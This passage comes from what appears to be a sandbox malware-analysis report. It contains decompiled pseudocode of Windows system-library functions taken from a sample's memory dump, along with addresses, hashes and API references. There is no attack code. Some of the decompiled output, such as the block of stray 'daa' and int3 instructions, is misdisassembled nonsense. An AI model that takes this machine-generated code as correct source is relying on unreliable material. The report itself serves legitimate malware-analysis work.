						E01318A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01279702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x133b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x01260055
0x0126005d
0x01260062
0x0126006c
0x0126006f
0x01260074
0x0126007a
0x0126007a
0x01260080
0x01260080
0x01260087
0x0126008d
0x0126008f
0x01260093
0x01260095
0x0126009b
0x012600f8
0x012600fb
0x012600fc
0x012600ff
0x01260108
0x01260108
0x012600a2
0x012600a6
0x012600b3
0x012600bc
0x012600c5
0x012600ca
0x012ac01e
0x00000000
0x00000000
0x012ac02d
0x012600d5
0x012600d9
0x012ac03d
0x012ac046
0x012ac046
0x012600df
0x012600e2
0x012600ea
0x012600ef
0x012600f2
0x012600f6
0x01260111
0x01260117
0x01260117
0x00000000
0x012600f6
0x012600d0
0x012600d0
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01260111

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 620d9d107e381e553a9417951e4426a3c9df2050c1903a7e5b4df988c4b99591
Instruction ID: 1059a52975a8f8f857d8d92364da4d5ecbffafe099b658ad7892ae8be8f48fb2
Opcode Fuzzy Hash: 620d9d107e381e553a9417951e4426a3c9df2050c1903a7e5b4df988c4b99591
Instruction Fuzzy Hash: 9831BD31221B05CFDB26CF2CC840BA6B7E9FF88714F14456DE59A87B90EB71A841DB94

Uniqueness

Uniqueness Score: -1.00%

Function 01272581 Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E01272581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				void* _t245;
				void* _t247;
				signed int _t254;
				signed int _t256;
				intOrPtr _t258;
				signed int _t261;
				signed int _t268;
				signed int _t271;
				signed int _t279;
				intOrPtr _t285;
				signed int _t287;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				unsigned int _t295;
				signed int _t299;
				intOrPtr* _t300;
				signed int _t301;
				signed int _t305;
				intOrPtr _t317;
				signed int _t326;
				signed int _t328;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				void* _t341;
				void* _t343;
				void* _t344;

				_t338 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0x133d360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t333 = 0x133b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t295 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t344 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t285 = 0x48;
				_t315 = 0 | _t344 == 0x00000000;
				_t326 = 0;
				_v37 = _t344 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t285 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t334 = 0xc0000106;
						goto L32;
					} else {
						_t333 = L01264620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t285);
						_v52 = _t333;
						__eflags = _t333;
						if(_t333 == 0) {
							_t334 = 0xc0000017;
							goto L32;
						} else {
							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
							_t50 = _t333 + 0x48; // 0x48
							_t328 = _t50;
							_t315 = _v32;
							 *((intOrPtr*)(_t333 + 0x3c)) = _t285;
							_t287 = 0;
							 *((short*)(_t333 + 0x30)) = _v48;
							__eflags = _t315;
							if(_t315 != 0) {
								 *(_t333 + 0x18) = _t328;
								__eflags = _t315 - 0x1338478;
								 *_t333 = ((0 | _t315 == 0x01338478) - 0x00000001 & 0xfffffffb) + 7;
								E0128F3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
								_t315 = _v32;
								_t341 = _t341 + 0xc;
								_t287 = 1;
								__eflags = _a8;
								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t279 = E012D39F2(_t328);
									_t315 = _v32;
									_t328 = _t279;
								}
							}
							_t299 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t334 = _v68;
								__eflags = 0;
								 *((short*)(_t328 - 2)) = 0;
								goto L32;
							} else {
								_t289 = _t333 + _t287 * 4;
								_v56 = _t289;
								do {
									__eflags = _t315;
									if(_t315 != 0) {
										_t240 =  *(_v60 + _t299 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t289 =  *(_v60 + _t299 * 4);
										 *(_t289 + 0x18) = _t328;
										_t244 =  *(_v60 + _t299 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M01272959))) {
												case 0:
													__ax =  *0x1338488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0128F3E0(__edi,  *0x133848c, __ax & 0x0000ffff);
														__eax =  *0x1338488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0128F3E0(_t328, _v80, _v64);
													_t274 = _v64;
													goto L26;
												case 2:
													 *0x1338480 & 0x0000ffff = E0128F3E0(__edi,  *0x1338484,  *0x1338480 & 0x0000ffff);
													__eax =  *0x1338480 & 0x0000ffff;
													__eax = ( *0x1338480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0128F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0128F3E0(_t328, _v76, _v36);
														_t274 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t328 = _t328 + (_t274 >> 1) * 2 + 2;
													__eflags = _t328;
													L27:
													_push(0x3b);
													_pop(_t276);
													 *((short*)(_t328 - 2)) = _t276;
													goto L28;
												case 6:
													__ebx =  *0x133575c;
													__eflags = __ebx - 0x133575c;
													if(__ebx != 0x133575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0128F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x133575c;
														} while (__ebx != 0x133575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1338478 & 0x0000ffff = E0128F3E0(__edi,  *0x133847c,  *0x1338478 & 0x0000ffff);
													__eax =  *0x1338478 & 0x0000ffff;
													__eax = ( *0x1338478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E012D39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1336e58 & 0x0000ffff = E0128F3E0(__edi,  *0x1336e5c,  *0x1336e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1336e58 & 0x0000ffff;
													__eax = ( *0x1336e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t299 = _v16;
													_t315 = _v32;
													L29:
													_t289 = _t289 + 4;
													__eflags = _t289;
													_v56 = _t289;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t299 = _t299 + 1;
									_v16 = _t299;
									__eflags = _t299 - _v48;
								} while (_t299 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t326 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M01272935))) {
							case 0:
								__ax =  *0x1338488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t315 =  &_v64;
								_v80 = E01272E3E(0,  &_v64);
								_t285 = _t285 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1338480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1338480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0125EEF0(0x13379a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0125EB70(__ecx, 0x13379a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t334;
												if(_t334 < 0) {
													L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t295 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1337b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0125EB70(__ecx, 0x13379a0);
										__eax = _v52;
										L36:
										_pop(_t327);
										_pop(_t335);
										__eflags = _v8 ^ _t338;
										_pop(_t286);
										return E0128B640(_t219, _t286, _v8 ^ _t338, _t315, _t327, _t335);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t281 = _v56;
								if(_v56 != 0) {
									_t315 =  &_v36;
									_t283 = E01272E3E(_t281,  &_v36);
									_t295 = _v36;
									_v76 = _t283;
								}
								if(_t295 == 0) {
									goto L44;
								} else {
									_t285 = _t285 + 2 + _t295;
								}
								goto L14;
							case 6:
								__eax =  *0x1335764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1338478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1338478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1336e58 & 0x0000ffff;
								__eax = ( *0x1336e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t326 = _t326 + 1;
								if(_t326 >= _v48) {
									goto L16;
								} else {
									_t315 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t300 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("daa");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t341;
					asm("daa");
					_t245 = _t244 + _t341;
					asm("daa");
					asm("daa");
					 *_t333 =  *_t333 + _t338;
					asm("daa");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t245;
					asm("daa");
					 *0x1f012726 =  *0x1f012726 + _t245;
					_pop(_t290);
					_t247 = _t341;
					_t343 = _t245 -  *_t300;
					 *_t328 =  *_t328 - _t247;
					 *0x2012b5b =  *0x2012b5b + _t333;
					 *_t328 =  *_t328 - _t343;
					 *((intOrPtr*)(_t247 - 0x9fed8d8)) =  *((intOrPtr*)(_t247 - 0x9fed8d8)) + _t247;
					asm("daa");
					asm("daa");
					 *_t333 =  *_t333 + _t290;
					 *_t328 =  *_t328 - _t247;
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t300;
					asm("daa");
					_a35 = _a35 + _t290;
					asm("daa");
					_pop(_t291);
					asm("daa");
					 *((intOrPtr*)(_t343 + _t291 * 2)) =  *((intOrPtr*)(_t343 + _t291 * 2)) + _t333;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x131ff00);
					E0129D08C(_t291, _t328, _t333);
					_v44 =  *[fs:0x18];
					_t329 = 0;
					 *_a24 = 0;
					_t292 = _a12;
					__eflags = _t292;
					if(_t292 == 0) {
						_t254 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t256 = 4;
						while(1) {
							_v40 = _t256;
							__eflags = _t256;
							if(_t256 == 0) {
								break;
							}
							_t305 = _t256 * 0xc;
							_v48 = _t305;
							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0x1221664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t271 = E0128E5C0(_a8,  *((intOrPtr*)(_t305 + 0x1221668)), _t292);
									_t343 = _t343 + 0xc;
									__eflags = _t271;
									if(__eflags == 0) {
										_t336 = E012C51BE(_t292,  *((intOrPtr*)(_v48 + 0x122166c)), _a16, _t329, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t256 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t256 = _t256 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t301 = _a4;
								__eflags = _t301;
								if(_t301 != 0) {
									_v36 = _t301;
									__eflags =  *_t301 - _t329;
									if( *_t301 == _t329) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t317 =  *((intOrPtr*)(_v44 + 0x30));
										_t258 =  *((intOrPtr*)(_t317 + 0x10));
										__eflags =  *((intOrPtr*)(_t258 + 0x48)) - _t301;
										if( *((intOrPtr*)(_t258 + 0x48)) == _t301) {
											__eflags =  *(_t317 + 0x1c);
											if( *(_t317 + 0x1c) == 0) {
												L106:
												_t336 = E01272AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t329 = 1;
													_t301 = _v36;
													goto L75;
												}
											} else {
												_t261 = E01256600( *(_t317 + 0x1c));
												__eflags = _t261;
												if(_t261 != 0) {
													goto L106;
												} else {
													_t301 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E01272C50(_t301, _a8, _t292, _a16, _a20, _a24, _t329);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0125EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t268 = E01272AE4( &_v36, _a8, _t292, _a16, _a20, _t336);
									_v32 = _t268;
									__eflags = _t268 - 0xc0000100;
									if(_t268 == 0xc0000100) {
										_v32 = E01272C50(_v36, _a8, _t292, _a16, _a20, _t336, 1);
									}
									_v8 = _t329;
									E01272ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t254 = _t336;
					}
					L70:
					return E0129D0D1(_t254);
				}
				L108:
			}

0x01272584
0x01272586
0x01272590
0x01272596
0x01272597
0x01272598
0x01272599
0x0127259e
0x012725a4
0x012725a9
0x012725ac
0x012725ae
0x012725b1
0x012725b2
0x012725b5
0x012725b8
0x012725bb
0x012725bc
0x012725bf
0x012725c2
0x012725c5
0x012725c6
0x012725cb
0x012725ce
0x012725d8
0x012725db
0x012725dd
0x012725de
0x012725e1
0x012725e3
0x012725e9
0x012726da
0x012726da
0x012726dd
0x012726e2
0x012b5b56
0x00000000
0x012726e8
0x012726f9
0x012726fb
0x012726fe
0x01272700
0x012b5b60
0x00000000
0x01272706
0x01272706
0x0127270a
0x0127270a
0x0127270d
0x01272713
0x01272716
0x01272718
0x0127271c
0x0127271e
0x012b5b6c
0x012b5b6f
0x012b5b7f
0x012b5b89
0x012b5b8e
0x012b5b93
0x012b5b96
0x012b5b9c
0x012b5ba0
0x012b5ba3
0x012b5bab
0x012b5bb0
0x012b5bb3
0x012b5bb3
0x012b5ba3
0x01272724
0x01272726
0x01272729
0x0127272c
0x0127279d
0x0127279d
0x012727a0
0x012727a2
0x00000000
0x0127272e
0x0127272e
0x01272731
0x01272734
0x01272734
0x01272736
0x012b5bc1
0x012b5bc1
0x012b5bc4
0x00000000
0x012b5bca
0x012b5bca
0x012b5bcd
0x00000000
0x012b5bd3
0x00000000
0x012b5bd3
0x012b5bcd
0x0127273c
0x0127273c
0x01272742
0x01272747
0x0127274a
0x0127274d
0x01272750
0x00000000
0x01272756
0x01272756
0x00000000
0x01272902
0x01272908
0x0127290b
0x00000000
0x01272911
0x0127291c
0x01272921
0x00000000
0x01272921
0x00000000
0x00000000
0x01272880
0x01272887
0x0127288c
0x00000000
0x00000000
0x01272805
0x0127280a
0x01272814
0x01272816
0x00000000
0x00000000
0x0127281e
0x01272821
0x01272823
0x00000000
0x01272829
0x01272829
0x01272831
0x0127283c
0x0127283e
0x00000000
0x0127283e
0x00000000
0x00000000
0x0127284e
0x01272850
0x01272851
0x01272854
0x01272857
0x0127285a
0x0127285c
0x0127285d
0x00000000
0x00000000
0x0127275d
0x01272761
0x00000000
0x01272767
0x0127276e
0x01272773
0x01272773
0x01272776
0x01272778
0x0127277e
0x0127277e
0x01272781
0x01272781
0x01272783
0x01272784
0x00000000
0x00000000
0x012b5bd8
0x012b5bde
0x012b5be4
0x012b5be6
0x012b5be8
0x012b5be9
0x012b5bee
0x012b5bf8
0x012b5bff
0x012b5c01
0x012b5c04
0x012b5c07
0x012b5c0b
0x012b5c0d
0x012b5c0d
0x012b5c15
0x012b5c18
0x012b5c1b
0x012b5c1b
0x012b5c1e
0x00000000
0x00000000
0x012728c3
0x012728c8
0x012728d2
0x012728d4
0x012728d8
0x012728db
0x012b5c26
0x012b5c28
0x012b5c2d
0x012b5c2d
0x00000000
0x00000000
0x012b5c34
0x012b5c36
0x012b5c49
0x012b5c4e
0x012b5c54
0x012b5c5b
0x012b5c5d
0x012b5c60
0x01272788
0x01272788
0x0127278b
0x0127278e
0x0127278e
0x0127278e
0x01272791
0x00000000
0x00000000
0x01272756
0x01272750
0x00000000
0x01272794
0x01272794
0x01272795
0x01272798
0x01272798
0x00000000
0x01272734
0x0127272c
0x01272700
0x012725ef
0x012725ef
0x012725ef
0x012725f2
0x012725f8
0x00000000
0x00000000
0x012725fe
0x00000000
0x012728e6
0x012728ec
0x012728ef
0x012728f5
0x012728f8
0x012728f8
0x00000000
0x012728f8
0x00000000
0x00000000
0x01272866
0x01272866
0x01272876
0x01272879
0x00000000
0x00000000
0x012727e0
0x012727e7
0x012727e9
0x012727eb
0x012b5afd
0x00000000
0x012b5afd
0x00000000
0x00000000
0x01272633
0x01272638
0x0127263b
0x0127263c
0x0127263e
0x01272640
0x01272642
0x01272647
0x01272649
0x0127264e
0x01272650
0x01272653
0x01272659
0x012726a2
0x012726a7
0x012726ac
0x012726b2
0x012b5b11
0x012b5b15
0x012b5b17
0x00000000
0x012726b8
0x012726b8
0x012726ba
0x012727a6
0x012727a6
0x012727a9
0x012727ab
0x012727b9
0x012727b9
0x012727be
0x012727c1
0x012727c3
0x012727c5
0x012727c7
0x012b5c74
0x012b5c79
0x012b5c79
0x012727c7
0x00000000
0x012726c0
0x012726c0
0x012726c3
0x012726c6
0x012726c6
0x012726c9
0x012726c9
0x00000000
0x012726c9
0x012726ba
0x0127265b
0x0127265b
0x0127265e
0x01272667
0x0127266d
0x01272677
0x0127267c
0x0127267f
0x01272681
0x012b5b49
0x012b5b4e
0x012727cd
0x012727d0
0x012727d1
0x012727d2
0x012727d4
0x012727dd
0x01272687
0x01272687
0x0127268a
0x0127268b
0x0127268e
0x0127268f
0x01272691
0x01272696
0x01272698
0x0127269d
0x0127269f
0x00000000
0x0127269f
0x01272681
0x00000000
0x00000000
0x01272846
0x00000000
0x00000000
0x01272605
0x0127260a
0x0127260c
0x01272611
0x01272616
0x01272619
0x01272619
0x0127261e
0x00000000
0x01272624
0x01272627
0x01272627
0x00000000
0x00000000
0x012b5b1f
0x00000000
0x00000000
0x01272894
0x0127289b
0x0127289d
0x012728a1
0x012b5b2b
0x012b5b2e
0x012b5b2e
0x012728a7
0x012728a9
0x012b5b04
0x012b5b09
0x012b5b09
0x012b5b09
0x00000000
0x00000000
0x012b5b35
0x012b5b3c
0x012728fb
0x012728fb
0x012726cc
0x012726cc
0x012726d0
0x00000000
0x012726d2
0x012726d2
0x00000000
0x012726d2
0x00000000
0x00000000
0x012725fe
0x0127292d
0x0127292f
0x01272930
0x01272935
0x01272937
0x01272938
0x0127293b
0x0127293c
0x0127293e
0x0127293f
0x01272940
0x01272942
0x01272944
0x01272947
0x01272948
0x0127294e
0x01272951
0x01272951
0x01272952
0x01272954
0x0127295a
0x0127295c
0x01272962
0x01272963
0x01272964
0x01272966
0x01272968
0x0127296b
0x0127296c
0x0127296f
0x01272972
0x01272977
0x01272978
0x0127297d
0x0127297e
0x0127297f
0x01272980
0x01272981
0x01272982
0x01272983
0x01272984
0x01272985
0x01272986
0x01272987
0x01272988
0x01272989
0x0127298a
0x0127298b
0x0127298c
0x0127298d
0x0127298e
0x0127298f
0x01272990
0x01272992
0x01272997
0x012729a3
0x012729a6
0x012729ab
0x012729ad
0x012729b0
0x012729b2
0x012b5c80
0x012729b8
0x012729b8
0x012729bb
0x012729c0
0x012729c5
0x012729c6
0x012729c6
0x012729c9
0x012729cb
0x00000000
0x00000000
0x012729cd
0x012729d0
0x012729d9
0x012729db
0x012729dd
0x01272a7f
0x01272a84
0x01272a87
0x01272a89
0x012b5ca1
0x012b5ca3
0x00000000
0x01272a8f
0x01272a8f
0x00000000
0x01272a8f
0x00000000
0x012729e3
0x012729e3
0x012729e3
0x00000000
0x012729e3
0x012729dd
0x00000000
0x012729db
0x012729e6
0x012729e9
0x012729eb
0x012729ed
0x012729f3
0x012729f5
0x012729f8
0x012729fa
0x01272a97
0x01272a9a
0x01272a9d
0x01272add
0x00000000
0x01272a9f
0x01272aa2
0x01272aa5
0x01272aa8
0x01272aab
0x012b5cab
0x012b5caf
0x012b5cc5
0x012b5cda
0x012b5cdc
0x012b5cdf
0x012b5ce5
0x00000000
0x012b5ceb
0x012b5ced
0x012b5cee
0x00000000
0x012b5cee
0x012b5cb1
0x012b5cb4
0x012b5cb9
0x012b5cbb
0x00000000
0x012b5cbd
0x012b5cbd
0x00000000
0x012b5cbd
0x012b5cbb
0x01272ab1
0x01272ab1
0x01272ac4
0x01272ac6
0x01272ac6
0x00000000
0x01272ac6
0x01272aab
0x00000000
0x01272a00
0x01272a09
0x01272a0e
0x01272a21
0x01272a24
0x01272a35
0x01272a3a
0x01272a3d
0x01272a42
0x01272a59
0x01272a59
0x01272a5c
0x01272a5f
0x01272a5f
0x012729fa
0x012729f3
0x01272a64
0x01272a64
0x01272a6b
0x01272a6b
0x01272a6d
0x01272a72
0x01272a72
0x00000000

Strings

PATH, xrefs: 01272642, 01272691

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 2f67faead5b84f70833a9b36d711f73875bf5351c79fe0d2196cd16caf7fa7d2
Instruction ID: 0db713f8b3a6abe78cdb4e3ab637a53bfb36eec2a37406cb600fb23edc2c6feb
Opcode Fuzzy Hash: 2f67faead5b84f70833a9b36d711f73875bf5351c79fe0d2196cd16caf7fa7d2
Instruction Fuzzy Hash: 17C19071D2021ADFDB29DF99D981BBEBBB5FF48740F084029E901BB250E774A941CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0124C962 Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0124C962(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x133d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0125EEF0(0x13370a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E012CF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0125EB70(_t29, 0x13370a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0128B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E012CF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x13370c0; // 0x0
					while(_t38 != 0x13370c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x133b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x0124c96a
0x0124c974
0x0124c988
0x0124c98a
0x012b7c9d
0x012b7c9f
0x012b7ca4
0x012b7cae
0x012b7cf0
0x012b7cf5
0x012b7cfa
0x0124c992
0x0124c996
0x0124c997
0x0124c998
0x0124c9a3
0x0124c9a3
0x012b7cb0
0x012b7cb7
0x012b7cbb
0x00000000
0x00000000
0x012b7cbd
0x012b7ce8
0x012b7cc5
0x012b7cc8
0x012b7cca
0x012b7cd0
0x012b7cd6
0x012b7cde
0x012b7ce4
0x012b7ce4
0x012b7cd0
0x00000000
0x012b7ce8
0x0124c990
0x00000000

